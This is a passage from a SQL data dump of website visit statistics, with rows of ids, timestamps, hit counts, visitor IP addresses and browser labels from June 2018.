,0,'167.114.150.96','other'),(259974,1529286841,1,1,0,0,'216.244.66.241','other'),(259975,1529287041,1,1,0,0,'87.250.224.46','other'),(259976,1529288102,1,1,0,0,'141.8.142.74','other'),(259977,1529288113,1,1,0,0,'62.205.134.182','other'),(259978,1529288196,1,1,0,0,'157.55.39.226','other'),(259979,1529289005,1,1,0,0,'8.29.198.25','other'),(259980,1529289462,1,1,0,0,'94.178.203.220','chrome'),(259981,1529289878,3,3,0,0,'141.8.142.74','other'),(259982,1529290558,1,1,0,0,'216.244.66.241','other'),(259983,1529290837,1,1,0,0,'178.154.171.88','other'),(259984,1529291712,1,1,0,0,'62.205.134.182','other'),(259985,1529292527,1,1,0,0,'216.244.66.241','other'),(259986,1529293408,1,0,1,0,'66.249.64.28',''),(259987,1529293750,220,220,0,0,'82.118.242.240','other'),(259988,1529293796,1,1,0,0,'216.244.66.241','other'),(259989,1529293953,1,1,0,0,'87.250.224.46','other'),(259990,1529294412,1,1,0,0,'8.29.198.25','other'),(259991,1529295031,3,3,0,0,'141.8.142.74','other'),(259992,1529295070,2,2,0,0,'87.250.224.46','other'),(259993,1529295117,1,1,0,0,'178.154.171.88','other'),(259994,1529295312,1,1,0,0,'62.205.134.182','other'),(259995,1529296200,1,1,0,0,'216.244.66.241','other'),(259996,1529296204,1,1,0,0,'178.154.171.88','other'),(259997,1529296410,1,1,0,0,'157.55.39.226','other'),(259998,1529297259,1,1,0,0,'188.231.244.35','chrome'),(259999,1529297435,1,1,0,0,'178.154.171.88','other'),(260000,1529297488,1,1,0,0,'216.244.66.241','other'),(260001,1529297598,1,1,0,0,'141.8.142.74','other'),(260002,1529298043,1,1,0,0,'195.10.210.70','chrome'),(260003,1529298643,2,2,0,0,'141.8.142.74','other'),(260004,1529298913,1,1,0,0,'62.205.134.182','other'),(260005,1529299842,1,1,0,0,'8.29.198.27','other'),(260006,1529299856,1,1,0,0,'141.8.142.74','other'),(260007,1529300234,1,0,1,0,'66.249.64.29',''),(260008,1529300514,1,1,0,0,'213.180.203.8','other'),(260009,1529300934,3,3,0,0,'91.196.178.169','chrome'),(260010,1529300966,1,1,0,0,'178.154.171.88','other'),(260011,1529301105,3,3,0,0,'178.95.66.250','chrome'),(260012,1529301169,1,0,1,0,'66.249.64.28',''),(260013,1529301188,1,1,0,0,'91.196.178.88','firefox'),(260014,1529301474,1,1,0,0,'77.222.134.102','other'),(260015,1529301561,2,2,0,0,'91.196.178.73','chrome'),(260016,1529301634,1,1,0,0,'141.8.142.74','other'),(260017,1529301731,24,24,0,0,'176.9.25.107','other'),(260018,1529301791,2,0,2,0,'66.249.64.29',''),(260019,1529302012,1,1,0,0,'178.95.66.250','chrome'),(260020,1529302115,1,1,0,0,'128.69.225.95','chrome'),(260021,1529302324,5,0,5,0,'66.249.64.28',''),(260022,1529302497,1,1,0,0,'91.196.177.46','chrome'),(260023,1529302512,1,1,0,0,'62.205.134.182','other'),(260024,1529302676,2,2,0,0,'91.196.178.73','chrome'),(260025,1529303761,1,0,1,0,'66.249.64.30',''),(260026,1529303839,1,1,0,0,'91.196.178.73','firefox'),(260027,1529304256,2,2,0,0,'141.8.142.74','other'),(260028,1529304301,1,1,0,0,'46.219.216.248','chrome'),(260029,1529304582,1,1,0,0,'178.154.171.88','other'),(260030,1529304669,1,1,0,0,'91.196.178.86','chrome'),(260031,1529304759,1,1,0,0,'91.196.178.73','firefox'),(260032,1529304986,5,5,0,0,'91.196.178.87','chrome'),(260033,1529305130,1,0,1,0,'66.249.64.28',''),(260034,1529305254,1,1,0,0,'8.29.198.26','other'),(260035,1529305722,1,1,0,0,'91.196.178.88','chrome'),(260036,1529305855,4,4,0,0,'141.8.142.74','other'),(260037,1529306001,1,1,0,0,'94.178.0.178','chrome'),(260038,1529306032,1,1,0,0,'66.102.9.38','chrome'),(260039,1529306111,1,1,0,0,'62.205.134.182','other'),(260040,1529306328,1,1,0,0,'176.122.100.143','chrome'),(260041,1529306336,2,2,0,0,'91.196.178.73','chrome'),(260042,1529306589,1,1,0,0,'46.161.9.39','firefox'),(260043,1529306884,1,1,0,0,'46.201.212.72','chrome'),(260044,1529307072,1,1,0,0,'141.8.142.74','other'),(260045,1529307247,1,1,0,0,'195.211.188.76','chrome'),(260046,1529307420,1,1,0,0,'91.196.178.90','firefox'),(260047,1529307476,1,1,0,0,'66.249.64.29','chrome'),(260048,1529307503,1,0,1,0,'66.249.64.28',''),(260049,1529307910,1,1,0,0,'91.196.178.186','chrome'),(260050,1529307913,1,1,0,0,'95.163.255.95','other'),(260051,1529308480,1,1,0,0,'178.154.200.41','other'),(260052,1529308718,1,0,1,0,'66.249.64.30',''),(260053,1529308740,1,0,1,0,'66.249.64.28',''),(260054,1529308760,1,0,1,0,'66.249.64.29',''),(260055,1529309424,23,23,0,0,'5.9.154.68','other'),(260056,1529309429,1,1,0,0,'91.196.178.87','chrome'),(260057,1529309712,1,1,0,0,'62.205.134.182','other'),(260058,1529309793,1,1,0,0,'95.163.255.94','other'),(260059,1529309987,1,1,0,0,'66.249.64.29','chrome'),(260060,1529310007,1,1,0,0,'46.147.217.135','msie'),(260061,1529310155,1,1,0,0,'91.196.178.86','chrome'),(260062,1529310543,2,2,0,0,'91.196.178.87','chrome'),(260063,1529310586,1,1,0,0,'141.8.142.74','other'),(260064,1529310686,1,1,0,0,'8.29.198.26','other'),(260065,1529311711,1,1,0,0,'95.135.232.68','chrome'),(260066,1529312093,2,2,0,0,'46.174.163.134','chrome'),(260067,1529312175,1,1,0,0,'31.134.113.31','chrome'),(260068,1529312260,1,1,0,0,'91.196.178.131','firefox'),(260069,1529312603,2,2,0,0,'91.196.178.171','chrome'),(260070,1529312678,5,5,0,0,'91.196.178.73','chrome'),(260071,1529312945,2,2,0,0,'130.180.217.121','chrome'),(260072,1529312965,1,1,0,0,'31.13.113.94','other'),(260073,1529312972,1,1,0,0,'31.13.112.138','other'),(260074,1529312976,1,1,0,0,'31.13.113.66','other'),(260075,1529312998,1,1,0,0,'66.220.151.177','other'),(260076,1529313034,1,1,0,0,'91.196.178.181','chrome'),(260077,1529313323,1,1,0,0,'47.96.233.88','other'),(260078,1529313324,1,1,0,0,'62.205.134.182','other'),(260079,1529313382,1,1,0,0,'213.160.138.82','chrome'),(260080,1529313739,1,1,0,0,'157.55.39.226','other'),(260081,1529313746,3,3,0,0,'91.196.178.87','chrome'),(260082,1529314188,1,1,0,0,'95.163.255.92','other'),(260083,1529314471,1,1,0,0,'37.73.19.225','chrome'),(260084,1529314772,1,1,0,0,'178.62.234.153','chrome'),(260085,1529314778,3,3,0,0,'141.8.142.74','other'),(260086,1529314790,1,1,0,0,'91.124.182.170','chrome'),(260087,1529315144,1,1,0,0,'95.135.232.68','chrome'),(260088,1529315366,1,1,0,0,'180.76.15.150','other'),(260089,1529315526,1,1,0,0,'46.211.3.20','chrome'),(260090,1529315654,1,0,1,0,'66.249.64.29',''),(260091,1529315662,1,1,0,0,'178.94.232.71','chrome'),(260092,1529315754,2,0,2,0,'66.249.64.28',''),(260093,1529316060,2,2,0,0,'146.185.157.238','chrome'),(260094,1529316092,1,1,0,0,'69.171.240.247','other'),(260095,1529316106,1,1,0,0,'8.29.198.27','other'),(260096,1529316391,1,1,0,0,'46.133.122.245','chrome'),(260097,1529316423,1,0,1,0,'66.249.64.30',''),(260098,1529316530,1,1,0,0,'91.196.178.39','chrome'),(260099,1529316571,2,2,0,0,'91.196.178.169','chrome'),(260100,1529316670,3,3,0,0,'95.135.61.229','chrome'),(260101,1529316735,1,1,0,0,'37.53.85.172','firefox'),(260102,1529316897,2,2,0,0,'130.180.217.121','chrome'),(260103,1529316911,1,1,0,0,'62.205.134.182','other'),(260104,1529316998,2,2,0,0,'91.224.96.176','chrome'),(260105,1529317115,2,2,0,0,'178.154.171.88','other'),(260106,1529317294,2,2,0,0,'146.185.157.238','chrome'),(260107,1529317319,2,2,0,0,'141.8.142.74','other'),(260108,1529318086,18,18,0,0,'167.114.150.96','other'),(260109,1529318332,2,2,0,0,'195.10.210.70','chrome'),(260110,1529318386,2,2,0,0,'141.8.142.74','other'),(260111,1529319729,1,1,0,0,'37.54.18.108','chrome'),(260112,1529319737,3,3,0,0,'141.8.142.74','other'),(260113,1529319876,1,1,0,0,'46.211.117.147','chrome'),(260114,1529320236,1,1,0,0,'91.196.178.87','chrome'),(260115,1529320512,1,1,0,0,'62.205.134.182','other'),(260116,1529320902,1,1,0,0,'92.112.224.169','chrome'),(260117,1529320924,2,2,0,0,'91.196.178.177','chrome'),(260118,1529321433,2,2,0,0,'91.196.178.169','chrome'),(260119,1529321481,4,0,4,0,'66.249.64.28',''),(260120,1529321518,1,1,0,0,'8.29.198.27','other'),(260121,1529321925,2,2,0,0,'91.196.178.90','chrome'),(260122,1529321951,2,2,0,0,'130.180.217.121','chrome'),(260123,1529322591,2,2,0,0,'46.174.163.134','chrome'),(260124,1529322733,1,1,0,0,'146.185.157.243','chrome'),(260125,1529322734,1,1,0,0,'69.171.240.253','other'),(260126,1529322848,1,1,0,0,'188.163.19.94','chrome'),(260127,1529322956,48,48,0,0,'144.217.86.210','other'),(260128,1529322987,1,1,0,0,'207.154.249.155','other'),(260129,1529323292,3,3,0,0,'91.196.178.73','chrome'),(260130,1529323302,1,1,0,0,'157.55.39.204','other'),(260131,1529323522,1,0,1,0,'66.249.64.28',''),(260132,1529323730,3,3,0,0,'178.154.171.88','other'),(260133,1529323786,2,2,0,0,'216.244.66.241','other'),(260134,1529324112,1,1,0,0,'62.205.134.182','other'),(260135,1529324288,1,1,0,0,'46.174.163.134','chrome'),(260136,1529324322,1,1,0,0,'141.8.142.74','other'),(260137,1529324329,7,7,0,0,'91.196.178.73','chrome'),(260138,1529324466,1,1,0,0,'66.249.70.25','chrome'),(260139,1529324769,1,0,1,0,'66.249.64.28',''),(260140,1529325311,3,3,0,0,'91.196.178.73','chrome'),(260141,1529325377,1,1,0,0,'46.211.119.222','other'),(260142,1529325398,1,1,0,0,'91.234.28.84','opera'),(260143,1529326174,1,1,0,0,'91.196.178.180','chrome'),(260144,1529326243,1,1,0,0,'91.196.177.59','chrome'),(260145,1529326950,1,1,0,0,'8.29.198.25','other'),(260146,1529327164,2,2,0,0,'109.251.209.3','chrome'),(260147,1529327171,1,1,0,0,'77.91.188.23','firefox'),(260148,1529327180,5,5,0,0,'91.196.178.73','chrome'),(260149,1529327656,1,1,0,0,'193.164.95.217','chrome'),(260150,1529327712,1,1,0,0,'62.205.134.182','other'),(260151,1529328097,3,3,0,0,'91.196.178.73','chrome'),(260152,1529328105,1,1,0,0,'31.13.113.190','other'),(260153,1529328112,1,1,0,0,'31.13.114.251','other'),(260154,1529328113,1,1,0,0,'31.13.113.93','other'),(260155,1529328125,1,1,0,0,'69.171.225.79','other'),(260156,1529328231,1,1,0,0,'46.211.115.9','chrome'),(260157,1529328267,1,1,0,0,'46.133.65.97','chrome'),(260158,1529328299,1,1,0,0,'5.58.150.120','chrome'),(260159,1529328447,1,1,0,0,'91.222.154.221','chrome'),(260160,1529329222,1,1,0,0,'37.73.131.213','chrome'),(260161,1529329249,1,1,0,0,'54.165.59.7','other'),(260162,1529329667,1,1,0,0,'141.8.142.74','other'),(260163,1529330183,1,1,0,0,'178.154.171.88','other'),(260164,1529330218,1,1,0,0,'66.249.70.27','chrome'),(260165,1529330601,3,3,0,0,'91.196.178.73','chrome'),(260166,1529330667,2,2,0,0,'141.8.142.74','other'),(260167,1529330790,2,0,2,0,'66.249.64.30',''),(260168,1529330946,1,1,0,0,'46.211.66.96','chrome'),(260169,1529331123,1,1,0,0,'69.171.225.218','other'),(260170,1529331319,1,1,0,0,'62.205.134.182','other'),(260171,1529331624,1,1,0,0,'188.230.43.254','other'),(260172,1529331943,1,0,1,0,'66.249.64.30',''),(260173,1529332345,1,1,0,0,'8.29.198.26','other'),(260174,1529332599,1,1,0,0,'66.220.146.211','other'),(260175,1529333079,14,14,0,0,'69.30.198.186','other'),(260176,1529333469,4,4,0,0,'37.55.253.72','chrome'),(260177,1529333581,1,1,0,0,'157.55.39.226','other'),(260178,1529334054,1,1,0,0,'188.230.43.254','other'),(260179,1529334948,1,1,0,0,'77.247.181.163','other'),(260180,1529335050,2,2,0,0,'91.196.178.177','chrome'),(260181,1529335118,1,1,0,0,'82.207.47.76','chrome'),(260182,1529335620,1,1,0,0,'178.154.171.88','other'),(260183,1529335976,1,1,0,0,'64.246.187.42','firefox'),(260184,1529335993,1,1,0,0,'141.8.142.74','other'),(260185,1529336275,1,0,1,0,'66.249.64.28',''),(260186,1529336402,1,1,0,0,'188.230.43.254','other'),(260187,1529336778,1,1,0,0,'216.244.66.241','other'),(260188,1529337025,1,1,0,0,'188.230.43.254','chrome'),(260189,1529337700,1,0,1,0,'66.249.64.28',''),(260190,1529337788,1,1,0,0,'8.29.198.25','other'),(260191,1529337791,2,2,0,0,'216.244.66.241','other'),(260192,1529338216,1,1,0,0,'46.211.128.231','chrome'),(260193,1529338554,1,1,0,0,'217.182.78.177','other'),(260194,1529338803,1,1,0,0,'188.230.43.254','other'),(260195,1529339801,2,2,0,0,'141.8.142.74','other'),(260196,1529340150,1,1,0,0,'91.196.178.81','firefox'),(260197,1529340401,1,1,0,0,'216.244.66.241','other'),(260198,1529340940,1,1,0,0,'141.8.142.74','other'),(260199,1529341204,1,1,0,0,'188.230.43.254','other'),(260200,1529341605,1,1,0,0,'195.12.59.18','other'),(260201,1529341635,1,0,1,0,'66.249.64.29',''),(260202,1529341640,1,1,0,0,'178.154.171.88','other'),(260203,1529341698,1,1,0,0,'37.9.113.115','other'),(260204,1529341979,1,1,0,0,'66.220.151.213','other'),(260205,1529342351,1,1,0,0,'141.8.142.74','other'),(260206,1529342356,1,1,0,0,'91.196.178.131','chrome'),(260207,1529343031,1,1,0,0,'188.230.43.254','other'),(260208,1529343151,1,1,0,0,'95.163.255.118','other'),(260209,1529343175,1,1,0,0,'95.163.255.115','other'),(260210,1529343185,1,1,0,0,'8.29.198.25','other'),(260211,1529343579,1,0,1,0,'66.249.70.29',''),(260212,1529343733,1,1,0,0,'141.8.142.74','other'),(260213,1529344141,1,1,0,0,'178.154.171.88','other'),(260214,1529344150,1,1,0,0,'141.8.142.152','other'),(260215,1529344485,2,2,0,0,'37.55.57.3','chrome'),(260216,1529344773,1,1,0,0,'173.252.84.198','other'),(260217,1529344826,1,1,0,0,'93.76.79.179','chrome'),(260218,1529345325,1,1,0,0,'178.93.148.157','chrome'),(260219,1529345737,1,1,0,0,'51.15.64.39','other'),(260220,1529346104,1,0,1,0,'66.249.70.29',''),(260221,1529346138,1,1,0,0,'178.154.171.88','other'),(260222,1529346431,2,2,0,0,'141.8.142.74','other'),(260223,1529346685,1,0,1,0,'66.249.64.28',''),(260224,1529346716,1,0,1,0,'66.249.64.29',''),(260225,1529346795,1,1,0,0,'87.250.224.46','other'),(260226,1529347182,1,1,0,0,'178.154.171.88','other'),(260227,1529347381,1,1,0,0,'216.244.66.241','other'),(260228,1529347390,3,3,0,0,'37.55.57.3','chrome'),(260229,1529347737,1,1,0,0,'95.132.0.168','chrome'),(260230,1529348201,3,3,0,0,'91.196.178.174','chrome'),(260231,1529348365,1,1,0,0,'178.154.171.88','other'),(260232,1529348642,1,1,0,0,'8.29.198.25','other'),(260233,1529349273,1,1,0,0,'178.154.171.88','other'),(260234,1529349357,1,1,0,0,'51.15.76.142','other'),(260235,1529349401,5,5,0,0,'91.196.178.178','chrome'),(260236,1529349552,1,1,0,0,'95.163.255.97','other'),(260237,1529349554,1,1,0,0,'95.163.255.95','other'),(260238,1529349669,1,0,1,0,'66.249.64.29',''),(260239,1529350192,1,1,0,0,'94.178.146.207','chrome'),(260240,1529350310,1,1,0,0,'157.55.39.209','other'),(260241,1529350362,1,1,0,0,'91.196.178.178','chrome'),(260242,1529351730,1,1,0,0,'46.105.124.55','chrome'),(260243,1529352180,2,2,0,0,'141.8.142.74','other'),(260244,1529352958,1,1,0,0,'95.216.145.173','other'),(260245,1529353515,2,2,0,0,'141.8.142.74','other'),(260246,1529353630,1,1,0,0,'107.167.107.91','other'),(260247,1529353880,1,1,0,0,'93.175.216.145','chrome'),(260248,1529354041,1,1,0,0,'8.29.198.27','other'),(260249,1529354377,1,1,0,0,'178.154.171.88','other'),(260250,1529354402,1,0,1,0,'66.249.65.156',''),(260251,1529355213,3,3,0,0,'185.125.231.241','chrome'),(260252,1529355808,1,1,0,0,'173.252.92.114','other'),(260253,1529355847,1,1,0,0,'180.76.15.8','other'),(260254,1529355917,1,1,0,0,'207.46.13.111','other'),(260255,1529355931,1,1,0,0,'216.244.66.241','other'),(260256,1529356193,1,1,0,0,'141.8.142.74','other'),(260257,1529356373,1,0,1,0,'66.249.65.155',''),(260258,1529356406,1,0,1,0,'66.249.65.125',''),(260259,1529356533,1,1,0,0,'51.15.76.142','other'),(260260,1529356557,1,1,0,0,'66.249.65.123','chrome'),(260261,1529357040,1,1,0,0,'178.154.171.88','other'),(260262,1529357210,1,1,0,0,'157.55.39.245','other'),(260263,1529358254,1,1,0,0,'37.9.113.182','other'),(260264,1529358383,1,1,0,0,'178.154.171.88','other'),(260265,1529358406,2,2,0,0,'87.250.224.46','other'),(260266,1529358958,1,1,0,0,'216.244.66.241','other'),(260267,1529359478,1,1,0,0,'8.29.198.27','other'),(260268,1529359990,2,2,0,0,'216.244.66.241','other'),(260269,1529361301,24,24,0,0,'144.76.220.40','other'),(260270,1529361446,1,1,0,0,'207.46.13.35','other'),(260271,1529361537,2,2,0,0,'178.154.171.88','other'),(260272,1529362238,2,0,2,0,'66.249.65.156',''),(260273,1529362949,5,0,5,0,'66.249.65.155',''),(260274,1529363042,4,0,4,0,'66.249.65.157',''),(260275,1529363070,1,1,0,0,'87.250.224.46','other'),(260276,1529363319,2,2,0,0,'141.8.142.74','other'),(260277,1529363333,1,1,0,0,'178.154.171.88','other'),(260278,1529363444,1,0,1,0,'66.249.65.156',''),(260279,1529363691,20,20,0,0,'142.4.200.37','other'),(260280,1529364464,2,0,2,0,'66.249.65.155',''),(260281,1529364586,1,1,0,0,'141.8.142.74','other'),(260282,1529364878,1,1,0,0,'8.29.198.26','other'),(260283,1529365041,2,2,0,0,'87.250.224.46','other'),(260284,1529365135,3,0,3,0,'66.249.65.156',''),(260285,1529367089,1,1,0,0,'178.154.171.88','other'),(260286,1529367211,3,3,0,0,'141.8.142.74','other'),(260287,1529367356,1,1,0,0,'216.244.66.241','other'),(260288,1529367753,1,1,0,0,'66.249.65.157','chrome'),(260289,1529368065,1,1,0,0,'178.154.171.88','other'),(260290,1529368733,1,1,0,0,'141.8.142.74','other'),(260291,1529369632,1,1,0,0,'178.154.171.88','other'),(260292,1529369715,1,0,1,0,'66.249.65.125',''),(260293,1529370310,2,0,2,0,'66.249.65.157',''),(260294,1529370324,1,1,0,0,'8.29.198.25','other'),(260295,1529370326,1,1,0,0,'66.249.65.156','chrome'),(260296,1529370390,1,1,0,0,'141.8.142.74','other'),(260297,1529371397,2,2,0,0,'141.8.142.74','other'),(260298,1529371440,2,2,0,0,'178.154.171.88','other'),(260299,1529371853,1,1,0,0,'207.46.13.35','other'),(260300,1529373335,4,4,0,0,'141.8.142.74','other'),(260301,1529374167,1,1,0,0,'157.55.39.31','other'),(260302,1529374361,1,1,0,0,'178.154.171.88','other'),(260303,1529374491,1,1,0,0,'216.244.66.241','other'),(260304,1529375199,1,1,0,0,'87.250.224.46','other'),(260305,1529375712,1,1,0,0,'8.29.198.26','other'),(260306,1529375748,1,1,0,0,'66.249.65.157','chrome'),(260307,1529376219,1,1,0,0,'141.8.142.74','other'),(260308,1529376335,2,2,0,0,'95.213.141.126','opera'),(260309,1529376975,1,1,0,0,'37.9.113.115','other'),(260310,1529378141,1,1,0,0,'207.46.13.100','other'),(260311,1529378532,1,1,0,0,'178.154.171.55','other'),(260312,1529378835,1,1,0,0,'37.73.219.163','other'),(260313,1529379518,1,1,0,0,'141.8.142.74','other'),(260314,1529379547,1,1,0,0,'216.244.66.241','other'),(260315,1529379937,12,12,0,0,'78.46.61.245','other'),(260316,1529380291,2,2,0,0,'178.154.171.88','other'),(260317,1529380583,2,2,0,0,'141.8.142.74','other'),(260318,1529381163,1,1,0,0,'8.29.198.25','other'),(260319,1529381528,1,1,0,0,'66.102.9.29','chrome'),(260320,1529382017,1,0,1,0,'66.249.65.157',''),(260321,1529382316,1,1,0,0,'141.8.132.22','other'),(260322,1529382566,1,1,0,0,'95.163.255.99','other'),(260323,1529383683,1,1,0,0,'180.76.15.161','other'),(260324,1529383993,2,2,0,0,'141.8.142.74','other'),(260325,1529384045,1,1,0,0,'37.9.113.115','other'),(260326,1529384745,1,1,0,0,'87.250.224.46','other'),(260327,1529385853,1,1,0,0,'107.167.107.91','other'),(260328,1529385877,3,3,0,0,'141.8.142.74','other'),(260329,1529386171,1,1,0,0,'91.196.178.73','chrome'),(260330,1529386443,2,2,0,0,'91.196.178.174','chrome'),(260331,1529386508,1,1,0,0,'91.196.178.86','firefox'),(260332,1529386560,1,1,0,0,'8.29.198.26','other'),(260333,1529387267,5,5,0,0,'91.196.178.87','chrome'),(260334,1529387464,1,1,0,0,'91.196.178.174','chrome'),(260335,1529387882,3,3,0,0,'141.8.142.74','other'),(260336,1529388014,1,1,0,0,'91.196.177.110','firefox'),(260337,1529388211,10,10,0,0,'69.30.213.202','other'),(260338,1529388618,1,1,0,0,'193.93.218.146','opera'),(260339,1529388672,1,1,0,0,'207.46.13.214','other'),(260340,1529388754,1,1,0,0,'91.196.178.174','chrome'),(260341,1529388972,2,2,0,0,'37.54.101.233','chrome'),(260342,1529390000,2,2,0,0,'46.201.241.5','chrome'),(260343,1529390323,3,3,0,0,'91.196.178.169','chrome'),(260344,1529390557,1,1,0,0,'213.180.203.8','other'),(260345,1529390722,1,1,0,0,'159.89.237.72','chrome'),(260346,1529390894,2,2,0,0,'141.8.142.74','other'),(260347,1529391042,1,1,0,0,'216.244.66.241','other'),(260348,1529391749,1,1,0,0,'157.55.39.5','other'),(260349,1529391834,2,2,0,0,'141.8.142.74','other'),(260350,1529392004,1,1,0,0,'8.29.198.27','other'),(260351,1529392202,1,1,0,0,'178.154.171.88','other'),(260352,1529392223,1,0,1,0,'66.249.65.155',''),(260353,1529392224,1,0,1,0,'66.249.65.156',''),(260354,1529392446,2,2,0,0,'91.196.178.73','chrome'),(260355,1529392502,2,2,0,0,'69.30.205.218','other'),(260356,1529392840,2,2,0,0,'91.196.178.71','chrome'),(260357,1529392967,1,1,0,0,'141.8.142.74','other'),(260358,1529393733,3,3,0,0,'91.196.178.181','chrome'),(260359,1529393930,1,1,0,0,'46.211.129.118','chrome'),(260360,1529394417,1,1,0,0,'77.111.246.18','chrome'),(260361,1529394704,1,1,0,0,'157.55.39.121','other'),(260362,1529394726,1,1,0,0,'163.172.4.153','chrome'),(260363,1529395215,1,1,0,0,'91.196.178.129','firefox'),(260364,1529395238,1,1,0,0,'207.46.13.36','other'),(260365,1529395357,1,1,0,0,'46.201.241.5','chrome'),(260366,1529395662,1,1,0,0,'141.8.142.74','other'),(260367,1529395713,1,1,0,0,'91.196.178.86','firefox'),(260368,1529396013,1,1,0,0,'91.196.177.176','chrome'),(260369,1529396124,1,1,0,0,'62.205.134.182','other'),(260370,1529396283,1,1,0,0,'216.244.66.241','other'),(260371,1529396469,1,1,0,0,'194.126.182.72','chrome'),(260372,1529396548,1,1,0,0,'46.173.175.126','chrome'),(260373,1529396625,1,1,0,0,'141.8.142.74','other'),(260374,1529396672,1,1,0,0,'87.250.224.46','other'),(260375,1529396675,1,1,0,0,'178.154.200.41','other'),(260376,1529397404,1,1,0,0,'8.29.198.26','other'),(260377,1529397595,1,1,0,0,'47.96.234.85','other'),(260378,1529397728,1,1,0,0,'37.9.113.182','other'),(260379,1529397859,3,3,0,0,'178.154.171.88','other'),(260380,1529397965,1,1,0,0,'141.8.142.74','other'),(260381,1529398047,1,1,0,0,'46.161.9.39','chrome'),(260382,1529398129,1,1,0,0,'157.55.39.121','other'),(260383,1529398624,1,1,0,0,'37.9.113.110','other'),(260384,1529398771,6,6,0,0,'91.196.178.73','chrome'),(260385,1529398964,3,3,0,0,'130.180.219.94','chrome'),(260386,1529399342,1,1,0,0,'178.154.171.88','other'),(260387,1529399656,1,1,0,0,'178.95.18.32','chrome'),(260388,1529399722,1,1,0,0,'62.205.134.182','other'),(260389,1529399781,1,1,0,0,'91.124.182.170','firefox'),(260390,1529400401,2,2,0,0,'91.196.178.87','chrome'),(260391,1529400485,1,1,0,0,'91.196.177.31','chrome'),(260392,1529400546,2,2,0,0,'141.8.142.74','other'),(260393,1529400737,1,1,0,0,'46.133.218.124','chrome'),(260394,1529400835,2,2,0,0,'91.196.177.46','chrome'),(260395,1529401042,1,1,0,0,'216.244.66.241','other'),(260396,1529401254,1,1,0,0,'92.112.125.243','chrome'),(260397,1529401311,2,2,0,0,'91.196.178.73','chrome'),(260398,1529401335,1,1,0,0,'93.180.64.220','other'),(260399,1529401783,1,0,1,0,'66.249.65.157',''),(260400,1529401875,1,0,1,0,'66.249.65.155',''),(260401,1529401876,1,1,0,0,'91.209.11.236','other'),(260402,1529402253,1,1,0,0,'141.8.142.74','other'),(260403,1529402330,1,1,0,0,'216.244.66.241','other'),(260404,1529402839,1,1,0,0,'8.29.198.25','other'),(260405,1529403315,1,1,0,0,'62.205.134.182','other'),(260406,1529403458,1,1,0,0,'216.244.66.241','other'),(260407,1529403679,1,1,0,0,'37.25.9.131','chrome'),(260408,1529404066,2,2,0,0,'91.196.178.184','chrome'),(260409,1529404321,1,1,0,0,'91.234.0.126','chrome'),(260410,1529404703,2,2,0,0,'141.8.142.74','other'),(260411,1529404960,1,1,0,0,'87.250.224.46','other'),(260412,1529404965,1,1,0,0,'178.154.171.60','other'),(260413,1529405012,1,1,0,0,'178.154.171.88','other'),(260414,1529405270,1,0,1,0,'66.249.65.156',''),(260415,1529405382,1,1,0,0,'95.163.255.96','other'),(260416,1529405509,1,1,0,0,'188.40.102.170','other'),(260417,1529405785,1,1,0,0,'46.211.106.92','chrome'),(260418,1529405879,4,4,0,0,'141.8.142.74','other'),(260419,1529406909,1,1,0,0,'193.93.218.146','opera'),(260420,1529406912,1,1,0,0,'62.205.134.182','other'),(260421,1529407277,2,2,0,0,'130.180.219.94','chrome'),(260422,1529407898,1,1,0,0,'157.55.39.194','other'),(260423,1529408259,1,1,0,0,'8.29.198.27','other'),(260424,1529408508,1,0,1,0,'66.249.65.156',''),(260425,1529408545,1,1,0,0,'157.55.39.241','other'),(260426,1529408643,2,2,0,0,'91.196.178.73','chrome'),(260427,1529408753,2,2,0,0,'91.196.178.87','chrome'),(260428,1529409321,2,2,0,0,'130.180.219.94','chrome'),(260429,1529409330,2,2,0,0,'141.8.142.74','other'),(260430,1529409446,1,1,0,0,'77.111.244.45','chrome'),(260431,1529409576,1,1,0,0,'80.91.162.132','chrome'),(260432,1529409668,2,2,0,0,'92.112.105.243','chrome'),(260433,1529409710,2,2,0,0,'91.196.178.74','chrome'),(260434,1529409945,3,3,0,0,'91.196.178.101','chrome'),(260435,1529410473,1,1,0,0,'141.8.142.74','other'),(260436,1529410512,1,1,0,0,'62.205.134.182','other'),(260437,1529411068,1,1,0,0,'178.154.171.88','other'),(260438,1529411200,1,1,0,0,'91.196.178.87','chrome'),(260439,1529411278,1,1,0,0,'95.163.255.97','other'),(260440,1529411456,1,1,0,0,'94.178.146.125','chrome'),(260441,1529411496,1,1,0,0,'216.244.66.241','other'),(260442,1529411517,1,1,0,0,'141.8.142.74','other'),(260443,1529412032,2,2,0,0,'46.201.69.189','chrome'),(260444,1529412300,1,1,0,0,'91.124.182.170','firefox'),(260445,1529412865,3,3,0,0,'91.196.178.73','chrome'),(260446,1529412890,1,1,0,0,'31.13.112.137','other'),(260447,1529412897,1,1,0,0,'31.13.114.117','other'),(260448,1529412916,1,1,0,0,'173.252.124.56','other'),(260449,1529412935,2,2,0,0,'91.196.178.74','chrome'),(260450,1529413154,1,1,0,0,'46.211.110.231','other'),(260451,1529413226,1,1,0,0,'178.154.171.88','other'),(260452,1529413254,1,1,0,0,'178.94.173.156','chrome'),(260453,1529413329,2,2,0,0,'91.124.182.170','firefox'),(260454,1529413397,1,1,0,0,'91.196.178.181','chrome'),(260455,1529413476,2,2,0,0,'5.9.155.37','other'),(260456,1529413567,1,1,0,0,'80.91.174.171','chrome'),(260457,1529413606,1,1,0,0,'66.249.65.157','chrome'),(260458,1529413688,1,1,0,0,'8.29.198.25','other'),(260459,1529413785,1,0,1,0,'66.249.65.156',''),(260460,1529413821,1,1,0,0,'157.55.39.241','other'),(260461,1529413886,1,1,0,0,'91.196.178.71','firefox'),(260462,1529414112,1,1,0,0,'62.205.134.182','other'),(260463,1529414615,1,1,0,0,'91.124.182.170','firefox'),(260464,1529414761,1,1,0,0,'46.133.83.152','chrome'),(260465,1529414858,1,1,0,0,'216.244.66.241','other'),(260466,1529414936,1,1,0,0,'91.196.178.101','chrome'),(260467,1529415927,1,1,0,0,'188.230.43.254','other'),(260468,1529416075,1,1,0,0,'216.244.66.241','other'),(260469,1529416168,1,1,0,0,'91.196.178.74','chrome'),(260470,1529416584,4,4,0,0,'91.196.178.87','chrome'),(260471,1529416608,1,1,0,0,'91.196.178.68','firefox'),(260472,1529416847,1,1,0,0,'95.24.133.206','msie'),(260473,1529416958,2,2,0,0,'141.8.142.74','other'),(260474,1529417025,1,1,0,0,'193.19.152.14','chrome'),(260475,1529417056,1,1,0,0,'91.196.178.101','chrome'),(260476,1529417657,1,1,0,0,'91.196.178.51','chrome'),(260477,1529417713,1,1,0,0,'62.205.134.182','other'),(260478,1529417787,1,1,0,0,'91.196.178.87','chrome'),(260479,1529418045,1,1,0,0